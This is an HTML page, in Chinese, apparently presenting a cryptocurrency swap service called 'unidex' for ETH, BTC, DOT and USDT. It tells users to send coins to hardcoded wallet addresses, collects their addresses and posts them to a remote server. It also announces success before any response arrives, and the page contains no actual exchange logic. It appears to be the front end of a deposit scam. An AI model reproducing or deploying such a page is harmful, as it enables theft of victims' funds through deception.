<!DOCTYPE html>
<html lang="zh-CN">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
	<title>unidex - 新加坡去中心化交易所</title>
	<style>
		body,ol,ul,h1,h2,h3,h4,h5,h6,p,th,td,dl,dd,form,fieldset,legend,input,textarea,select{margin:0;padding:0} 
		body{font:16px"宋体","Arial Narrow",HELVETICA;background:#fff;-webkit-text-size-adjust:100%;} 
		a{text-decoration:none} 
		a:hover{color:#cd0200;text-decoration:underline;text-decoration:none} 
		a:visited{text-decoration:none}
		em{font-style:normal} 
		li{list-style:none} 
		img{border:0;vertical-align:middle} 
		table{border-collapse:collapse;border-spacing:0} 
		p{word-wrap:break-word} 
		input:focus{ outline: none; } 
		select,option{outline: none;border: 0; background: transparent;}
		html,body{-webkit-flex;display: flex;flex-direction:column; justify-content: center;align-items: center ;flex-wrap:wrap;width: 100%;background-color: rgb(253, 234, 241)}

		/*.all{display: -webkit-flex;display: flex;background-color: rgb(253, 234, 241)}*/
		.header{display: -webkit-flex; display: flex;align-items: center ;text-align: center; width:100%;height: 50px; border-bottom-style:solid;border-bottom-width: 1px;border-bottom-color:#ead9d9;}
		.home{flex: 1;color:#cc4949;border-right-style:solid;border-right-width: 1px;border-right-color:#ead9d9;}
		.principle{flex:1;color:#cc4949;border-right-style:solid;border-right-width: 1px;border-right-color:#ead9d9;}
		.about{flex:1;color:#cc4949;border-right-style:solid;border-right-width: 1px;border-right-color:#ead9d9;}
		.tips{display: -webkit-flex; display: flex;align-items: center ; height: 50px; font-size:10px;color:#cc4949;flex-wrap:   wrap ;}
		.ok{display: -webkit-flex; display: flex;text-align:center ; align-items: center ; height: 80px; font-size:10px;flex-wrap:   wrap ;}
		.transaction{ display: -webkit-flex; display: flex;justify-content: center;align-items: center ; flex-direction:column; width: 300px; height: 280px; }
		.action{display: -webkit-flex; display: flex;  width: 280px; height: 50px; align-items: center ;color: #cc4949; }
		.from{display: -webkit-flex; display: flex;  width: 280px; height: 60px; border:solid  1px #ead9d9; border-radius:10px ; }
		.to{display: -webkit-flex; display: flex; width: 280px; height: 60px;  border:solid  1px #ead9d9; border-radius:10px ;}
		.fromid{display: -webkit-flex; display: flex;margin-top: 10px;margin-bottom:20px;  width: 280px; height: 40px; font-size:10px;border:solid  1px #ead9d9; border-radius:10px ;}
		.toid{display: -webkit-flex; display: flex;margin-top: 16px;   width: 280px; height: 40px;font-size:10px;border:solid  1px #ead9d9; border-radius:10px ;}

		.go{display: -webkit-flex; display: flex; margin-top: 16px; width: 150px; height: 40px; align-items: center ;justify-content: center;  border-radius:10px ;color:#e11313;font-weight:bold; background:#fcd7e5;}
	</style>
	<script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body class="all">
	<div class="header">
		<a class="home" href="./index.html">首页</a>
		<a class="about" href="./about.html">关于</a>
		<a class="principle" href="./explain.html">原理</a>
	</div>
	<div class="tips">
		提示：成交价格以火币市场价为准,手续费0.02%
	</div> 
	
	<div class="transaction">
		<div class="action">
			FROM
		</div>
		<select class="from" id="from"> 
		  <option value ="请选择">请选择</option>
		  <option value ="ETH">ETH</option>
		  <option value ="BTC">BTC</option>
		  <option value="DOT">DOT</option>
		  <option value="USDT">USDT</option>
		</select>
		<div class="bi"></div>
		<div class="fromtips"></div>
		<div class="action">
			TO
		</div>
		
		<select class="to" id="to"> 
		  <option value ="请选择">请选择</option>
		  <option value ="ETH">ETH</option>
		  <option value ="BTC">BTC</option>
		  <option value="DOT">DOT</option>
		  <option value="USDT">USDT</option>
		</select>
		
	</div>
	<div class="totips"></div>
	<div class="gotips"></div>
	<script type="text/javascript">
		$("#from").bind("change",function(){
	        //获取被选中的option的值
	        var fromtype = $(this).val();
	        if (fromtype == "ETH") {
	        	alert("请先将ETH转入到资金池：0xfb87f8f844c240039Ade7eaD622Fb432ac2C7F3C")
	        	$(".fromtips").html('<input class="fromid" type="text" name="fromname" placeholder=" 输入你转账的ETH地址">');
	        	$(".bi").html('<div class="ok">请先将ETH转入资金池：0xfb87f8f844c240039Ade7eaD622Fb432ac2C7F3C</div>');
	        }else if(fromtype == "BTC"){
	        	alert("请先将BTC转入到资金池：3HYUo1yu2qHWWoSqaSmFrRYvu9rmtRkoi2")
	        	$(".fromtips").html('<input class="fromid" type="text" name="fromname" placeholder=" 输入你转账的BTC地址">');
	        	$(".bi").html('<div class="ok">请先将BTC转入资金池：3HYUo1yu2qHWWoSqaSmFrRYvu9rmtRkoi2</div>');
	        }else if(fromtype == "DOT"){
	        	alert("请先将DOT转入到资金池：16dNYvvK34JMWmn9717gSNK3f5DjpEaGWEhYaAKfEXuVZwq")
	        	$(".fromtips").html('<input class="fromid" type="text" name="fromname" placeholder=" 输入你转账的DOT地址">');
	        	$(".bi").html('<div class="ok">请先将DOT转入资金池：16dNYvvK34JMWmn9717gSNK3f5DjpEaGWEhYaAKfEXuVZwq</div>');
	        }else if(fromtype == "USDT"){
	        	alert("请先将USDT 转入到资金池：0x79285c83021a7b1cb8d1af1bd632f25795c08254")
	        	$(".fromtips").html('<input class="fromid" type="text" name="fromname" placeholder=" 输入你转账的USDT地址">');
	        	$(".bi").html('<div class="ok">请先将USDT 转入资金池：0x79285c83021a7b1cb8d1af1bd632f25795c08254</div>');
	        }

	    });
	    $("#to").bind("change",function(){
	        var totype = $(this).val();
	        if (totype == "ETH") {
	        	$(".totips").html('<input class="toid" type="text" name="toname" placeholder=" 输入你收ETH的地址">');
	        	$(".gotips").html('<div class="go">开始兑换</div>');
	        }else if(totype == "BTC"){
				$(".totips").html('<input class="toid" type="text" name="toname" placeholder=" 输入你收BTC的地址">');
	        	$(".gotips").html('<div class="go">开始兑换</div>');
	        }else if(totype == "DOT"){
				$(".totips").html('<input class="toid" type="text" name="toname" placeholder=" 输入你收DOT的地址">');
	        	$(".gotips").html('<div class="go">开始兑换</div>');
	        }else if(totype == "USDT"){
				$(".totips").html('<input class="toid" type="text" name="toname" placeholder=" 输入你收USDT的地址">');
	        	$(".gotips").html('<div class="go">开始兑换</div>');
	        }
	    });
	    $(".gotips").click(function(){
		  var from_value = $('.fromid').val();
		  var to_value = $('.toid').val();
		  if(from_value != "" && to_value != "" && from_value != undefined && to_value != undefined ){
			  alert("提交成功，预计5分钟到账，请留意你的钱包。");
		  	$.ajax({
				url: "https://sg.unidex.world/post/",
				async: false,
				type: "POST",
				data: {fromname:from_value,toname:to_value},
				dataType: "json",
				success: function (data) {
				    if(data.ok=="yes"){
							alert("5分钟内处理完毕，请留意你的钱包");
						}else{
							alert("网络出错了");
						}
				}
			});
		  }else{
		  	alert("缺少参数值");
		  }
		
		});
	     
	</script>
</body>
</html>
